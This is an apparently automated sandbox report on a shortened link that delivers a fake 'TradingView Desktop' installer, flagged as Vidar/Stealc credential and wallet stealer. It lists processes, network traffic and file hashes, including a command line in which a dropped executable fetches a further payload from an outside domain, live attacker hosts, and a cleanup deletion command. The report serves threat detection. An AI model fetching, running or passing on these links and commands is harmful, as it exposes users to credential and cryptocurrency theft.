Analysis Overview
Threat Level: Known bad
The file https://cutt.ly/8esAXbUV was found to be: Known bad.
Malicious Activity Summary
Detect Vidar Stealer
Stealc
Vidar
Downloads MZ/PE file
Executes dropped EXE
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Modifies registry class
Delays execution with timeout.exe
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-28 18:42
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-28 18:42
Reported
2024-06-28 18:44
Platform
win10v2004-20240611-en
Max time kernel
128s
Max time network
127s
Command Line
Signatures
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
Vidar
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\KFIIJJ.exe | N/A |
| N/A | N/A | C:\ProgramData\KFIIJJ.exe | N/A |
| N/A | N/A | C:\ProgramData\KFIIJJ.exe | N/A |
| N/A | N/A | C:\ProgramData\KFIIJJ.exe | N/A |
| N/A | N/A | C:\ProgramData\KFIIJJ.exe | N/A |
| N/A | N/A | C:\ProgramData\KFIIJJ.exe | N/A |
| N/A | N/A | C:\ProgramData\KFIIJJ.exe | N/A |
| N/A | N/A | C:\ProgramData\KFIIJJ.exe | N/A |
| N/A | N/A | C:\ProgramData\KFIIJJ.exe | N/A |
| N/A | N/A | C:\ProgramData\KFIIJJ.exe | N/A |
| N/A | N/A | C:\ProgramData\KFIIJJ.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cutt.ly/8esAXbUV
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8e90446f8,0x7ff8e9044708,0x7ff8e9044718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5784 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6624 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe
"C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe"
C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe
"C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe"
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\\KFIIJJ.exe http://mamallan.life/new_clip.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\KFIIJJ.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAECGCGHCGHC" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe
"C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1916 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cutt.ly | udp |
| US | 104.22.0.232:443 | cutt.ly | tcp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| US | 8.8.8.8:53 | ucae5785d7fd5dcc3b4cf0a118b9.dl.dropboxusercontent.com | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.64.125.162.in-addr.arpa | udp |
| GB | 162.125.64.15:443 | ucae5785d7fd5dcc3b4cf0a118b9.dl.dropboxusercontent.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 15.64.125.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.251.201.195.in-addr.arpa | udp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| US | 8.8.8.8:53 | mamallan.life | udp |
| DE | 178.162.206.251:80 | mamallan.life | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| US | 8.8.8.8:53 | 251.206.162.178.in-addr.arpa | udp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| US | 8.8.8.8:53 | tea.arpdabl.org | udp |
| DE | 207.180.253.128:80 | tea.arpdabl.org | tcp |
| US | 8.8.8.8:53 | 128.253.180.207.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 41.249.124.192.in-addr.arpa | udp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
| DE | 195.201.251.214:9000 | 195.201.251.214 | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | b704c9ca0493bd4548ac9c69dc4a4f27 |
| SHA1 | a3e5e54e630dabe55ca18a798d9f5681e0620ba7 |
| SHA256 | 2ebd5229b9dc642afba36a27c7ac12d90196b1c50985c37e94f4c17474e15411 |
| SHA512 | 69c8116fb542b344a8c55e2658078bd3e0d3564b1e4c889b072dbc99d2b070dacbc4394dedbc22a4968a8cf9448e71f69ec71ded018c1bacc0e195b3b3072d32 |
\??\pipe\LOCAL\crashpad_2320_ZOKBAEKWECVVNCXR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 477462b6ad8eaaf8d38f5e3a4daf17b0 |
| SHA1 | 86174e670c44767c08a39cc2a53c09c318326201 |
| SHA256 | e6bbd4933b9baa1df4bb633319174de07db176ec215e71c8568d27c5c577184d |
| SHA512 | a0acc2ef7fd0fcf413572eeb94d1e38aa6a682195cc03d6eaaaa0bc9e5f4b2c0033da0b835f4617aebc52069d0a10b52fc31ed53c2fe7943a480b55b7481dd4e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6573d9f9dc72169f042a38d0730e1c50 |
| SHA1 | f4476a9b90d2552e51d2107dc8ab2c0731b23a8a |
| SHA256 | bfdbf09358de9ddc17b105b951c6044a9e00416ba406ced8d73e6955f5771150 |
| SHA512 | 980e37fe2e9ae4311ddec82634e7e6448dd49f50a2f6ebc246c0cd126600d246afe2bd1bf9832f1401983cb2e01e85295e34d8aa8d5fd7349af57d1ef1118668 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 36ddcaa090b9dfa68a2ff2e5eb285eda |
| SHA1 | 3353bdf9f4b5427b3560b9a9662cd50fbd71d7b9 |
| SHA256 | 898982dcecd83e01a290790eead35477480013e0fd6112ea84e0cefb95a3e36f |
| SHA512 | 401c24702e23ff2226963f32fddcf5082edff1b37daa54dbca80795f6bd42b95cd50fd82ad29fabeb43008d6cd55fd1d623e94ee6cefb4280ceb099aaad85d63 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8d99ff1d6fc7a8a81a287c04c6098a1e |
| SHA1 | faf0cdd464e497d94fa2d08cfc43fb3b7519e3b5 |
| SHA256 | ce26abf3590d9bea7271a3b7fecee8815136bca7e5b8fd56c34cec3ddfd29048 |
| SHA512 | 194770f34f65320b3c7bacc1dcc0563e226e890a28feb5a7715be981d5e4c1ebc301d852c3444e38c16d7b767dcdbfd4477f13fe00de33553816eca399ba6066 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | f480ddd2d1b1b44a5da2cdba89968194 |
| SHA1 | 88df43a4ff0d5d2714e805554d1babe277607b29 |
| SHA256 | 781e363dff966c09f3a76b70e092abb3eb1ee6b1709dfdfe37768fd3295e55a2 |
| SHA512 | 7224589c709b28abc71f28ab766df35dc560bf4eae19af44f7598a33c3606fb16ad428eb91fb29301ed1685f7615e470ea478844414f7615fc25039845e52e16 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 918243d22017b45dbb833c59ead1faf1 |
| SHA1 | d1ed1290ebbc86f853407f9269c8916f83d9254f |
| SHA256 | 3a283c7e0d3fca3c8afbede8cb287356979a8a199c1a90515c8fc561d2d00f2c |
| SHA512 | 1f00cd8590550166c20bd84d0edb13e8e654aa2f98d2d5c836d5801f96d3f62457d2ad27b1f4e29236b0a550928c98db50b6af153a587a1358c0f4ac4c575774 |
memory/5772-125-0x0000000000CE0000-0x0000000000CE1000-memory.dmp
memory/5772-126-0x0000000000D00000-0x0000000000D01000-memory.dmp
memory/5772-127-0x0000000004450000-0x0000000004451000-memory.dmp
memory/5772-128-0x0000000004480000-0x0000000004481000-memory.dmp
memory/5772-129-0x0000000004490000-0x0000000004491000-memory.dmp
memory/5772-130-0x000000000B460000-0x000000000B461000-memory.dmp
memory/5772-131-0x000000000B470000-0x000000000B471000-memory.dmp
memory/5772-132-0x0000000000D10000-0x0000000001F08000-memory.dmp
memory/5772-135-0x0000000061E00000-0x0000000061EF3000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6db0c1791ab9c63ca34ef45537eef6b0 |
| SHA1 | e4e1a0702bcc73d7cd40531f971fea17a3761c42 |
| SHA256 | 9d0d555b46e162191ac60066690b6b0ab63ce11794ad49b22380a576b93a89c2 |
| SHA512 | 658b1b75e5bceae254ed49c68423c081deef500b3e2ec1ac35afd080c57ed551078e8a635c00d2c7de3c583aee2dbca84bbd83b76da435746a5f1b0d4027e791 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
| MD5 | 57c00c9e906a00285c025e56e3f6b30f |
| SHA1 | c87a2733b6500763f2d5be4fc05126abb3c0c5e9 |
| SHA256 | c538d175083b79d82b9be65365aa25e7fd08da7c918343fdfd50e84fe9b9bd26 |
| SHA512 | 27756481e08c59b4a25c6d7195f777764dedb32489f5c6e6d1a76ece27bbed93082863635253b347a3c4c13c4014a582290c95f157b796642fad5094f50eca4b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
| MD5 | 76b4057c893f1b4f34e7e7c50f413719 |
| SHA1 | be223344de5ce11d3200da1eace3e4e9e465bb7c |
| SHA256 | 2f0969a8e050fac4dfa36b81d97fa11b82799760693b68e2b7036999ff7179e2 |
| SHA512 | 4ee0072345cafc4da91b5d441a9b80b9a0a39f6293e6f89f172dac7c6846dc982343479b1211e5b8bbc211b628207c14b3f938712b7ebfb552595531cc8bb62d |
memory/4136-210-0x00000000048B0000-0x00000000048B1000-memory.dmp
memory/4136-211-0x00000000048C0000-0x00000000048C1000-memory.dmp
memory/4136-212-0x00000000048D0000-0x00000000048D1000-memory.dmp
memory/4136-213-0x0000000004900000-0x0000000004901000-memory.dmp
memory/4136-214-0x0000000004910000-0x0000000004911000-memory.dmp
memory/4136-215-0x0000000004920000-0x0000000004921000-memory.dmp
memory/4136-216-0x0000000004930000-0x0000000004931000-memory.dmp
memory/4136-217-0x0000000000D10000-0x0000000001F08000-memory.dmp
C:\ProgramData\KFIIJJ.exe
| MD5 | 2890a00ef6943ed98e2b7c6e3e49ae1c |
| SHA1 | 9072a751e68fe39222aebc87ffb898a423310ce9 |
| SHA256 | 0ab41930f0a18d7629031bf5cd9a8c7090c13983c1d7567b9018185f0fa18f0d |
| SHA512 | dd01c349264e431f3ec900e05062fa4300a4f8a9219edf4f7f8014a92dadd4aae0f05cc4a103f30bdd4d9915460edb03769ffdff0c9e290acd4c89b3a16542fe |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8Z1Z4637\new_clip[1].exe
| MD5 | 7cfdc2aee2ad1a7ef6f7715178aa8f93 |
| SHA1 | fe57e4be70cf241a2c0cc2724088ae4c8830a816 |
| SHA256 | 3c352a7f11ef8cca36e6d1c8a940c6c9e5e60a7d3a07c3a464a7f1e3ce035b46 |
| SHA512 | 8be581dab7c20dbd95cc3987554ed5317e8dc9f22f26cfe353f1d4bc0590e767f321cda6987c2dcbdf1a7aba83cb3a2163c7cad8fcee7414c150bdf686d71469 |
C:\ProgramData\DAECGCGHCGHC\EGIDBF
| MD5 | 1f2cb924ab7c6c964d77c6a61098ff57 |
| SHA1 | efa42f9dc9d3c95179613c1afabd7906e86d4a42 |
| SHA256 | 16f191e6355d32099b7f25945270f621bef6f92b3e5c1da178bc21e60912b470 |
| SHA512 | 7aa55921af23ae4b9456cd3317391c8d8b927e266ef41a0e41c89a68798d7c53c62f730ee71977f3d465be3c8510a68e5ebabde73ea183b4c94af867daa209a7 |
C:\ProgramData\DAECGCGHCGHC\KJEHCG
| MD5 | 975f1a1e9506cb4ecf67908349f93d70 |
| SHA1 | b4ef860be2eb4b48beec790fa24aa93e75e526d6 |
| SHA256 | b574e73c5c3f65df0099e958fc5b9959738daae7b2b8854e78815ccb08f564a8 |
| SHA512 | aee94612c838beed21be31f04482440a0357f5de9d1e426cc7ef0dd2deff9c15a912d19b0e83c10cfbeea044dcdf5b45e582a16e8a0e5027a133c885dde602f0 |
memory/1328-274-0x00000000044E0000-0x00000000044E1000-memory.dmp
memory/1328-275-0x00000000044F0000-0x00000000044F1000-memory.dmp
memory/1328-276-0x0000000004500000-0x0000000004501000-memory.dmp
memory/1328-277-0x0000000004530000-0x0000000004531000-memory.dmp
memory/1328-278-0x0000000004540000-0x0000000004541000-memory.dmp
memory/1328-279-0x0000000004560000-0x0000000004561000-memory.dmp
memory/1328-280-0x0000000004570000-0x0000000004571000-memory.dmp
memory/1328-281-0x0000000000D10000-0x0000000001F08000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
